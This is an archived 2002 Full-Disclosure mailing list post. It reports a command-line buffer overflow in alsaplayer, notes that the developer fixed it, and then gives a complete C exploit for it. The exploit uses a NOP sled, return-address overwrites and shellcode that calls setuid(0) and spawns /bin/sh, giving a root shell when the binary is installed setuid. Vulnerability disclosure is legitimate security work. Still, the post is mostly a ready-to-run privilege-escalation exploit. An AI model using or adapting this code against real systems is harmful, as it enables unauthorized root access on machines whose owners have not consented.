|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: KF (dotslash_at_snosoft.com)
Date: Fri Sep 20 2002 - 09:42:27 CDT
I noticed that it is very common in the troubleshooting of an
application that uses alsa-sound to set the setuid bit on the binary in
question. One example of this can be found in the archives of the
alsaplayer mailing list:
http://lists.tartarus.org/pipermail/alsaplayer-devel/2002-February/000656.html
and
http://lists.tartarus.org/pipermail/alsaplayer-devel/2002-February/000657.html
I spoke to the developer of alsasound and he promptly fixed the
problems. Although he does not condone the setuid bit on the alsasound
program the author noted that some users choose to set the bit.
The fixes for the above problem can be found at:
http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/alsaplayer/alsaplayer/app/Main.cpp.diff?r1=1.66&r2=1.67
http://alsaplayer.org/changelog.php3
Wed Sep 18 11:52:43 CEST 2002
-----------------------------
* Code cleanups
* JACK related updates
* commandline buffer overflow fixes.
...
-KF
/*
* Alsaplayer exploit for a buffer overflow found by KF (snosoft.com)
*
* This program is not installed with special permissions by default.
* However, the author himself does recommend to do so under certain
* conditions:
*
* http://lists.tartarus.org/pipermail/alsaplayer-devel/2002-February/000656.html
* http://lists.tartarus.org/pipermail/alsaplayer-devel/2002-February/000657.html
*
* Author: zillion[at]safemode.org (09/2002)
*
* Tested on Red Hat 7.3 linux with alsaplayer-devel-0.99.71-1
*
*/
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#define BUFFER_SIZE 1056
#define NOP 0x90
#define RET 0xbfffe440
char shellcode[]=
"\xeb\x26\x5e\x31\xc0\x89\xc3\x89\xc1\x89\xc2\xb0\xa4\xcd\x80"
"\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xd5\xff\xff\xff"
"\x2f\x62\x69\x6e\x2f\x73\x68";
void print_error(char * burb) {
printf(" Error: %s !\n",burb); exit(0);
}
void usage(char *progname) {
printf("\n*--- -- - Alsaplayer b0f exploit - -- ---*\n");
printf("\nDefault: %s -f /path/to/alsaplayer",progname);
printf("\nOption : %s -o <offset>\n\n",progname);
exit(0);
}
int main(int argc, char **argv){
char buffer[BUFFER_SIZE];
char file[30];
long retaddress;
int arg,offset=500;
struct stat sbuf;
if(argc < 2) { usage(argv[0]); }
while ((arg = getopt (argc, argv, "f:o:")) != -1){
switch (arg){
case 'f':
strncpy(file,optarg,sizeof(file));
if(stat(argv[2], &sbuf)) { print_error("No such file");}
break;
case 'o':
offset = atoi(optarg);
if(offset < 0) { print_error("Offset must be positive");}
break;
default :
usage(argv[0]);
}
}
retaddress = (RET - offset);
memset(buffer,NOP,BUFFER_SIZE);
memcpy(buffer + BUFFER_SIZE - (sizeof(shellcode) + 8) ,shellcode,sizeof(shellcode) -1);
/* Overwrite EBP and EIP */
*(long *)&buffer[BUFFER_SIZE - 8] = retaddress;
*(long *)&buffer[BUFFER_SIZE - 4] = retaddress;
if(execl(file,file,"-p",buffer,NULL) != 0) {
print_error("Could not execute alsaplayer ");
}
return 0;
}
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]